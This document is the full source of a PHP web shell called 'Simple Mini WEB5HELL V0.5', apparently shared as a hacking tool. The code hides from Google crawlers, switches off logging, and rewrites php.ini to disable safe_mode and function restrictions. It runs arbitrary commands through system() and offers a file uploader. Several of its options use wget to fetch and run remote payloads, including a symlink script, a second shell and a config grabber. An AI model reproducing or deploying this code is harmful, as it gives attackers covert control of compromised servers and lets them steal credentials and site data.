Simple Mini WEB5HELL V0.5 (Jigoku Tsushin)

1. <? /* SIMPLE MINI WEB5HELL V0.5 | AUTHOR : AZZATSSIN'S CYBERSERKER */
2. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
3.     header('HTTP/1.0 404 Not Found');
4.     exit;
5. }
6. $auth_pass = "ed4544d345562697a49e5cfc6a8ab545";
7. @session_start();
8. @error_reporting(0);
9. @ini_set('error_log',NULL);
10. @ini_set('log_errors',0);
11. @ini_set('max_execution_time',0);
12. @set_time_limit(0);
13. @set_magic_quotes_runtime(0);
14. function printLogin() {
15. error_reporting(0); echo'<meta content=SIMPLE WEB5HELL-BY-AZZATSSINS-CYBERSERKERS name=description>
16. <head><title>JIGOKU TSUSHIN</title></head><head>
17. <body bgcolor=black><center><a href=mailto:[email protected]><img src=http://jigoku.magix.net/images/homeimage.png></a></center><br>
18.    <center>
19.    <form method=post>
20.    <input type=text style=background-color:black; color:red; name=pass>
21. <br>
22.    <input type=submit value=Send>
23.    </form></center>';
24.     exit;
25. }
26. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] )) {
27.     if( empty( $auth_pass ) || ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) ) {
28.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
29.     } else {
30.         printLogin();
31.     }
32. }
33. @ini_set('output_buffering',0);
34. @ini_set('display_errors', 0);
35. $phi=fopen("php.ini","w+");
36. fwrite($phi,"safe_mode = Off
37. disable_functions = NONE
38. safe_mode_gid = OFF
39. open_basedir = OFF ");
40. echo"<title>SIMPLE WEB5HELL V0.5</title><head><style type='text/css' media='all,handheld'/>
41. body{
42.   background-color:#878787;
43.   background-image: url('http://azzat.wap.mu/files/1049320/matrix-azzatssins.gif');
44.   background-repeat: repeat;
45.   background-position: center;
46.   background-attachment: fixed;
47.   font-family: Comic Sans;
48.   font-color: #FFFFFF;
49.   font-size: 25px;
50.   text-align: center;
51. }
52.  
53. input, select{
54.   background:#002222;
55.   padding:3px;
56.   border-radius:3px;
57.   color:#fee908;
58.   border:2px dotted #00ff00; width: 250px;
59. }
60. .login{
61.    background: none repeat scroll 0% 0% rgb(105, 167, 78);
62.    border-color: rgb(152, 195, 125) rgb(59, 110, 34) rgb(44, 81, 21);
63.    color: rgb(255, 255, 255);
64. }
65. .login {
66.    font-size: 13px;
67.    line-height: 23px;
68. }
69. </style>
70. <body bgcolor=silver><br>"; echo '<b><i><font color="orange">Disable Function:</font></i></b>';
71. if(ini_get('disable_functions') == ''){
72.  echo ' <font color="green"> None</font>';
73.  }
74. else{
75.  echo '<font color="red">';
76.  echo ini_get('disable_functions');
77.  echo '</font>';
78.  }
79.  echo"<br><fieldset><a href=?web=shell><img src=http://azzat.wap.mu/files/1049320/az-bn-idb.png width=128px height=128></a>
80. <a href=?system=command><img src=http://cdn.osxdaily.com/wp-content/uploads/2014/08/terminal-icon-osx-300x262.png width=128px height=128></a><a href=?symbolic=link><img src=http://iconizer.net/files/Devine_icons/thumb/128/Folder-Links.png width=128px height=128></a><a href=?file=uploader><img src=https://cdn2.iconfinder.com/data/icons/windows-8-metro-style/512/upload.png width=128px height=128></a><a href=?mysql=connect><img src=https://dn-linuxcn.qbox.me/data/attachment/album/201407/28/155012q9p55wfwupyfejie.png width=128px height=128></a><a href=?config=grabber><img src=https://cdn2.iconfinder.com/data/icons/windows-8-metro-style/512/data_configuration.png width=128px height=128></a></fieldset>"; if($_GET['system']=="command"){ echo'<center><br><font color=violet><b><i>COMMAND</i></b></font><br><form method="post">
81. <label>
82. <input type="text" name="cmd" style="background-color:#000000; color:#de0100; font-family:Corbel;" value=""></label>
83. <label>
84. <input type="submit" name="Submit" value="Execute" />
85. </label>
86. <br><textarea name="textarea" style="width:14cm; height:5cm; background-color:#576557; color:#6fd800;">
87. '; if(isset($_POST['cmd']))
88. {
89.  $cmd = $_POST['cmd'];
90.  if($cmd == "")
91. {
92.  echo "                              Please Insert Command!";
93.  }
94.  elseif(isset($cmd))
95.  {
96.  $output = system($cmd);
97.  printf("$output\n");
98.  }
99.  }
100.  echo'</textarea>
101. </form>
102. <br><br></center>'; } if($_GET['symbolic']=="link"){ system('wget http://x-x-x.yn.lt/py');system('mv py symlink.py');system('python symlink.py');system('rm symlink.py'); echo'<meta http-equiv="Refresh" content= "0; url=sl">'; } if($_GET['web']=="shell"){ system('wget http://x-x-x.yn.lt/v5'); system('mv v5 v5.php'); echo'<meta http-equiv="Refresh" content= "0; url=v5.php">';
103. } if($_GET['file']=="uploader"){ echo'<center><br><b>'.php_uname().'</b><br>';
104.  echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
105.  echo '<input name="uploadto" type="text" size="80" value="'.getcwd().'"><br />';
106.  echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form></center>';
107.  if( $_POST['_upl'] == "Upload" ) {
108.  if(@copy($_FILES['file']['tmp_name'], $_POST['uploadto'].'/'.$_FILES['file']['name'])) {
109.  echo '<center><b><a href=mailto:[email protected]>Upload success!</a></b></center><br>'.$_POST['uploadto']."/".$_FILES['file']['name'];
110. } else {
111. echo '<center><b><a href=http://fb.me/AZZATSSINS.CYBERSERKERS>Upload failed!</a></b></center>'; }
112. }} if($_GET['mysql']=="connect"){ system('wget http://wget.yu.tl/files/mysql.css'); system('mv mysql.css mysql.php'); echo'<meta http-equiv="Refresh" content= "0; url=mysql.php">';
113. } if($_GET['config']=="grabber"){ system('wget http://wget.yu.tl/files/conf.zip'); system('mv conf.zip conf.php'); echo'<meta http-equiv="Refresh" content= "0; url=conf.php">';
114. } ?>